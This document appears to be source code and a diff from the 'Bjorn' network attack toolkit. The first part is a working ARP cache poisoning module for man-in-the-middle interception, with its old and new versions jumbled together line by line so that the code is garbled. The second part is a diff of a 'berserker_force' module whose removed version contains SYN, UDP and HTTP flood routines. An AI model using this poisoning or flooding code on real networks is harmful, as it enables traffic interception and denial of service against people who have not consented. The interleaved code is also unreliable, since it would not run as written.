SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")
class ARPSpoof:
def __init__(self, target_ip, gateway_ip, interface, delay):
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.interface = interface
self.delay = delay
conf.iface = self.interface # Set the interface
print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")
"""ARP cache poisoning action integrated with Bjorn orchestrator."""
def get_mac(self, ip):
"""Gets the MAC address of a target IP by sending an ARP request."""
print(f"Retrieving MAC address for IP: {ip}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try:
arp_request = ARP(pdst=ip)
response = sr1(arp_request, timeout=2, verbose=False)
if response:
print(f"MAC address found for {ip}: {response.hwsrc}")
return response.hwsrc
else:
print(f"No ARP response received for IP {ip}")
return None
os.makedirs(OUTPUT_DIR, exist_ok=True)
except OSError:
pass
logger.info("ARPSpoof initialized")
def _check_scapy(self):
try:
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
print(f"Error retrieving MAC address for {ip}: {e}")
return None
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def spoof(self, target_ip, spoof_ip):
"""Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP."""
print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}")
target_mac = self.get_mac(target_ip)
spoof_mac = self.get_mac(spoof_ip)
if not target_mac or not spoof_mac:
print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
return
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
send(arp_response, verbose=False)
print(f"Spoofed ARP packet sent to {target_ip} claiming to be {spoof_ip}")
result = subprocess.run(
["ip", "route", "show", "default"],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e:
print(f"Error sending ARP packet to {target_ip}: {e}")
def restore(self, target_ip, spoof_ip):
"""Sends an ARP packet to restore the legitimate IP/MAC mapping for the target and spoof IP."""
print(f"Restoring ARP association for {target_ip} using {spoof_ip}")
target_mac = self.get_mac(target_ip)
gateway_mac = self.get_mac(spoof_ip)
if not target_mac or not gateway_mac:
print(f"Cannot restore ARP, MAC addresses not found for {target_ip} or {spoof_ip}")
return
logger.debug(f"Gateway detection via ip route failed: {e}")
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=gateway_mac)
send(arp_response, verbose=False, count=5)
print(f"ARP association restored between {spoof_ip} and {target_mac}")
from scapy.all import conf as scapy_conf
gw = scapy_conf.route.route("0.0.0.0")[2]
if gw and gw != "0.0.0.0":
return gw
except Exception as e:
print(f"Error restoring ARP association for {target_ip}: {e}")
logger.debug(f"Gateway detection via scapy failed: {e}")
return None
def execute(self):
"""Executes the ARP spoofing attack."""
# ─────────────────── ARP Operations ──────────────────────
@staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try:
print(f"Starting ARP Spoofing attack on target {self.target_ip} via gateway {self.gateway_ip}")
from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
while True:
target_mac = self.get_mac(self.target_ip)
gateway_mac = self.get_mac(self.gateway_ip)
@staticmethod
def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
"""Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
if not target_mac or not gateway_mac:
print(f"Error retrieving MAC addresses, stopping ARP Spoofing")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
@staticmethod
def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
"""Restore legitimate ARP mapping with multiple packets."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
print(f"Sending ARP packets to poison {self.target_ip} and {self.gateway_ip}")
self.spoof(self.target_ip, self.gateway_ip)
self.spoof(self.gateway_ip, self.target_ip)
elapsed = time.time() - start_time
pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(self.delay)
time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
return "success"
except KeyboardInterrupt:
print("Attack interrupted. Restoring ARP tables.")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
print("ARP Spoofing stopped and ARP tables restored.")
except Exception as e:
print(f"Unexpected error during ARP Spoofing attack: {e}")
logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
def save_settings(target, gateway, interface, delay):
"""Saves the ARP spoofing settings to a JSON file."""
try:
os.makedirs(SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"gateway": gateway,
"interface": interface,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as file:
json.dump(settings, file)
print(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
print(f"Failed to save settings: {e}")
def load_settings():
"""Loads the ARP spoofing settings from a JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as file:
return json.load(file)
except Exception as e:
print(f"Failed to load settings: {e}")
return {}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP Spoofing Attack Script")
parser.add_argument("-t", "--target", help="IP address of the target device")
parser.add_argument("-g", "--gateway", help="IP address of the gateway")
parser.add_argument("-i", "--interface", default=conf.iface, help="Network interface to use (default: primary interface)")
parser.add_argument("-d", "--delay", type=float, default=2, help="Delay between ARP packets in seconds (default: 2 seconds)")
args = parser.parse_args()
# Load saved settings and override with CLI arguments
settings = load_settings()
target_ip = args.target or settings.get("target")
gateway_ip = args.gateway or settings.get("gateway")
interface = args.interface or settings.get("interface")
delay = args.delay or settings.get("delay")
if not target_ip or not gateway_ip:
print("Target and Gateway IPs are required. Use -t and -g or save them in the settings file.")
exit(1)
# Save the settings for future use
save_settings(target_ip, gateway_ip, interface, delay)
# Execute the attack
spoof = ARPSpoof(target_ip=target_ip, gateway_ip=gateway_ip, interface=interface, delay=delay)
spoof.execute()
shared_data = SharedData()
try:
spoofer = ARPSpoof(shared_data)
logger.info("ARPSpoof module ready.")
except Exception as e:
logger.error(f"Error: {e}")

View File

@@ -1,315 +1,617 @@
# Resource exhaustion testing tool for network and service stress analysis.
# Saves settings in `/home/bjorn/.settings_bjorn/berserker_force_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to test.
# -p, --ports Ports to test (comma-separated, default: common ports).
# -m, --mode Test mode (syn, udp, http, mixed, default: mixed).
# -r, --rate Packets per second (default: 100).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stress).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
import os
import json
import argparse
from datetime import datetime
import logging
import threading
import time
import queue
import socket
import os
import random
import requests
from scapy.all import *
import psutil
from collections import defaultdict
import socket
import ssl
import statistics
import time
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
from scapy.all import IP, TCP, sr1, conf as scapy_conf # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce"
b_module = "berserker_force"
b_enabled = 0
b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
b_category = "stress"
b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stress"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "berserker_force_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 80, 443, 445, 3306, 3389, 5432]
b_tags = ["stress", "availability", "resilience"]
b_args = {
"mode": {
"type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: even a refused connection or error page counts
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except URLError:
return None
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
# -------------------- Main class ----------------------------------------------
class BerserkerForce:
def __init__(self, target, ports=None, mode='mixed', rate=100, output_dir=DEFAULT_OUTPUT_DIR):
self.target = target
self.ports = ports or DEFAULT_PORTS
self.mode = mode
self.rate = rate
self.output_dir = output_dir
self.active = False
self.lock = threading.Lock()
self.packet_queue = queue.Queue()
self.stats = defaultdict(int)
self.start_time = None
self.target_resources = {}
"""Service resilience tester -- orchestrator-compatible Bjorn action."""
def monitor_target(self):
"""Monitor target's response times and availability."""
while self.active:
try:
for port in self.ports:
try:
start_time = time.time()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
result = s.connect_ex((self.target, port))
response_time = time.time() - start_time
with self.lock:
self.target_resources[port] = {
'status': 'open' if result == 0 else 'closed',
'response_time': response_time
}
except:
with self.lock:
self.target_resources[port] = {
'status': 'error',
'response_time': None
}
time.sleep(1)
except Exception as e:
logging.error(f"Error monitoring target: {e}")
def __init__(self, shared_data):
self.shared_data = shared_data
def syn_flood(self):
"""Generate SYN flood packets."""
while self.active:
try:
for port in self.ports:
packet = IP(dst=self.target)/TCP(dport=port, flags="S",
seq=random.randint(0, 65535))
self.packet_queue.put(('syn', packet))
with self.lock:
self.stats['syn_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in SYN flood: {e}")
# ------------------------------------------------------------------ #
# Phase helpers #
# ------------------------------------------------------------------ #
def udp_flood(self):
"""Generate UDP flood packets."""
while self.active:
try:
for port in self.ports:
data = os.urandom(1024) # Random payload
packet = IP(dst=self.target)/UDP(dport=port)/Raw(load=data)
self.packet_queue.put(('udp', packet))
with self.lock:
self.stats['udp_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in UDP flood: {e}")
def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Gather target ports from the port argument, row data, or DB hosts table."""
ports: List[int] = []
def http_flood(self):
"""Generate HTTP flood requests."""
while self.active:
try:
for port in [80, 443]:
if port in self.ports:
protocol = 'https' if port == 443 else 'http'
url = f"{protocol}://{self.target}"
# Randomize request type
request_type = random.choice(['get', 'post', 'head'])
try:
if request_type == 'get':
requests.get(url, timeout=1)
elif request_type == 'post':
requests.post(url, data=os.urandom(1024), timeout=1)
else:
requests.head(url, timeout=1)
with self.lock:
self.stats['http_requests'] += 1
except:
with self.lock:
self.stats['http_errors'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in HTTP flood: {e}")
def packet_sender(self):
"""Send packets from the queue."""
while self.active:
try:
if not self.packet_queue.empty():
packet_type, packet = self.packet_queue.get()
send(packet, verbose=False)
with self.lock:
self.stats['packets_sent'] += 1
else:
time.sleep(0.1)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def calculate_statistics(self):
"""Calculate and update testing statistics."""
duration = time.time() - self.start_time
stats = {
'duration': duration,
'packets_per_second': self.stats['packets_sent'] / duration,
'total_packets': self.stats['packets_sent'],
'syn_packets': self.stats['syn_packets'],
'udp_packets': self.stats['udp_packets'],
'http_requests': self.stats['http_requests'],
'http_errors': self.stats['http_errors'],
'target_resources': self.target_resources
}
return stats
def save_results(self):
"""Save test results and statistics."""
# 1) Explicit port argument
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'configuration': {
'target': self.target,
'ports': self.ports,
'mode': self.mode,
'rate': self.rate
p = int(port) if str(port).strip() else None
if p:
ports.append(p)
except Exception:
pass
# 2) Row data (Ports column, semicolon-separated)
if not ports:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
},
'statistics': self.calculate_statistics()
}
output_file = os.path.join(self.output_dir, f"stress_test_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
"stress": {
"probes_sent": sr["sent"],
"probes_ok": sr["success"],
"probes_fail": sr["fail"],
"mean_rt_s": round(_safe_mean(sr["times"]), 6),
"stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
"max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
"post_baseline": {
"samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
def start(self):
"""Start stress testing."""
self.active = True
self.start_time = time.time()
threads = []
# Start monitoring thread
monitor_thread = threading.Thread(target=self.monitor_target)
monitor_thread.start()
threads.append(monitor_thread)
# Start sender thread
sender_thread = threading.Thread(target=self.packet_sender)
sender_thread.start()
threads.append(sender_thread)
# Start attack threads based on mode
if self.mode in ['syn', 'mixed']:
syn_thread = threading.Thread(target=self.syn_flood)
syn_thread.start()
threads.append(syn_thread)
if self.mode in ['udp', 'mixed']:
udp_thread = threading.Thread(target=self.udp_flood)
udp_thread.start()
threads.append(udp_thread)
if self.mode in ['http', 'mixed']:
http_thread = threading.Thread(target=self.http_flood)
http_thread.start()
threads.append(http_thread)
return threads
# Overall summary
total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
)
def stop(self):
"""Stop stress testing."""
self.active = False
self.save_results()
def save_settings(target, ports, mode, rate, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"mode": mode,
"rate": rate,
"output_dir": output_dir
return {
"summary": {
"ports_tested": len(ports),
"total_probes_sent": total_sent,
"total_probes_ok": total_ok,
"total_probes_fail": total_fail,
"avg_degradation_pct": avg_degradation,
},
"per_port": per_port,
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Write the JSON report and return the file path."""
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as exc:
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
def main():
parser = argparse.ArgumentParser(description="Resource exhaustion testing tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to test (comma-separated)")
parser.add_argument("-m", "--mode", choices=['syn', 'udp', 'http', 'mixed'],
default='mixed', help="Test mode")
parser.add_argument("-r", "--rate", type=int, default=100, help="Packets per second")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
